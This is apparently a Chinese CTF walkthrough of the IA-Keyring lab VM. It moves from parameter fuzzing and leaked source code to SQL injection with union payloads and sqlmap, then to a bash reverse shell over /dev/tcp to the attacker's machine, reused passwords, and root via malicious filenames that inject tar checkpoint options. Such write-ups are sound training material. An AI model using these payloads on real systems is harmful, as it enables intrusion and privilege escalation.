前言
靶机:IA-Keyring,IP地址为192.168.10.11
攻击:kali,IP地址为192.168.10.2
都采用虚拟机,网卡为桥接模式
文章中涉及的靶场以及相关工具,放置在网盘中,链接
https://pan.quark.cn/s/55d71f3e14c9
主机发现
因为是下载靶机到本地,所以是同一局域网,同一网段,同一网卡下,所以为求速度可以使用arp-scan -l或netdiscover -r 192.168.10.1/24
若想要模拟真实环境,可以使用nmap
信息收集
使用nmap扫描端口
网站信息探测
访问80端口网站,可以看到是登录和注册,查看页面源代码,当点击login时,会跳转到login.php处
这是login.php的界面
尝试注册一个用户test进行测试,注册成功会有弹窗,用户注册成功
若注册的用户已存在,会提示弹窗,用户已经被注册过
已注册成功的test登录,查看登录后有什么东西,查看页面源代码,这四个功能对应四个php文件
访问control时,出现一段话,感觉像是提示一样
使用gobuster爆破一下目录,发现大致一样
漏洞寻找
访问history.php,没有返回内容,不过经过测试,history是检验当前是否有用户处于登录状态的,也就是是否有用户是活跃状态的,这里当以test注册并登录后,再点击logout,这时候再去观察history,发现有内容了
那么这里肯定检测了,检测的方式呢,估计是cookie,毕竟之前我在未注册用户test的时候,访问这里是没有任何内容的,但是注册了test然后登录后,就有了这个信息。
在前面的时候,忘了放置一张图,这里再放置,这里我打字错了,是记录每一个活动
既然是记录了活动,那么假设这个php还可以查询具体用户的记录呢
不管如何,就假设这里是通过传参接收用户名进行的检测,也就是http://192.168.10.10/history.php?FUZZ=test,这个FUZZ就是可能存在的传参名,接收test用户名,以burp测试有无cookie时,这个信息的显示情况
可以确定,是检测cookie的,并且这个cookie是在用户登录状态时生效。
那么在进行ffuf测试的时候,可能就需要使用到cookie,这里cookie的获取可以直接从浏览器的开发者工具获取,或者这里的burp,再或者使用curl也是可以获取到cookie的
shell
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.10.10/history.php?FUZZ=test -fs 0 -b "PHPSESSID=bp3ie1j20iek5bpjc3f3gibabs"
漏洞利用
获取参数user,那么测试会给出什么信息,指定user=test,发现这和登录时点击的功能点相似
再次指定已经注册过的用户进行测试,当然默认的admin都挺多的,并且前面的时候我测试过,在注册界面,若已注册会弹窗提示的。
指定user=admin,给出一个链接,估计可能是源码泄露了
信息泄露
访问地址,并访问其中的每个文件,发下每个文件都有数据库信息,这是作者怕忘了吗。
只有control这个,有system()函数,并且还注释到,这是不安全的函数
整理这里获取的信息,首先是数据库
| 用户名 | 密码 | 数据库 |
|---|---|---|
root |
sqluserrootpassw0r4 |
users |
然后是接收的get参数cmdcntr
那么测试在control.php这个参数是否可行,但是测试发现以test用户无法触发,说明需要获取admin的密码
sql注入
那么当前可利用的点只有history,这里知道参数的,而且根据前面信息给出的数据库,猜测可能存在sql注入,尝试以'闭合,发现信息没了,有可能
shell
history.php?user=admin'
history.php?user=admin' or 1=1--+最终对比,存在sql注入的
测试,还可以进行union查询,这里可以手工,也可以sqlmap,这里直接展示最终的手工注入命令
shell
http://192.168.10.10/history.php?user=admin' union select concat(name,password) from details--+
然后再用sqlmap测试,存在sql注入,这里还是需要以登录状态的,所以cookie要加上
shell
sqlmap -u "http://192.168.10.10/history.php?user=admin" --cookie="PHPSESSID=bp3ie1j20iek5bpjc3f3gibabs"
然后再把所有数据下载
shell
sqlmap -u "http://192.168.10.10/history.php?user=admin" --cookie="PHPSESSID=bp3ie1j20iek5bpjc3f3gibabs" --dump
命令执行反弹shell
以admin和获取的密码直接登录,然后去测试crontal.php界面
shell
http://192.168.10.10/control.php?cmdcntr=id
命令执行了,那么就构造一个反弹shell,需要先在kali中使用nc开启监听9999端口
shell
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.2/9999 0>&1'
#经过URL编码处理一下
/bin/bash+-c+'bash+-i+>%26+/dev/tcp/192.168.10.2/9999+0>%261'
使用前面从数据库中查询到的john的密码Sup3r$S3cr3t$PasSW0RD进行测试,发现可以登录,一码多用啊
查看john家目录下的flag
使用find寻找具有SUID权限文件,发现当前目录下就有一个
shell
find / -perm -4000 -print 2>/dev/null
tar 文件名提权
发现文件为可执行文件,并且是相当于tar命令
还是下载这个文件到kali中,然后分析
把当前目录下的所有文件,压缩至archive.tar
那么根据这个尝试构造文件名,使得在进行压缩的时候,进行一个连接匹配,导致语句的执行
一般tar的suid提权大概是下面这样
shell
/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh主要构造后面两个即可,当然如果是执行语句,构造很长也是可行的,毕竟是以suid权限执行。不过最好是复制/bin/bash到tmp,并给予suid权限,这可是一个可维持长时间的
构造语句
shell
#都是在同一目录下,也就是可执行文件compress同级目录
echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
执行compress,可以发现在/tmp下已经有了一个suid权限的bash
切换到/tmp目录下,然后执行当前目录下的bash,即可获取root权限
总结
该靶场考察以下几点:
- 对于登录时的一些逻辑,比如这里的
history就是通过cookie进行检验,所以在遇到可注册的界面时,都要去测试,最好是抓包测试 - 参数污染,根据逻辑去模糊测试
- 信息泄露,在
github上找到源码 - sql注入,考察登录后的sql注入,并且是字符型
- 一码多用的情况
tar的SUID提权 ,主要就是*这个危险,导致把文件名变为可提权的命令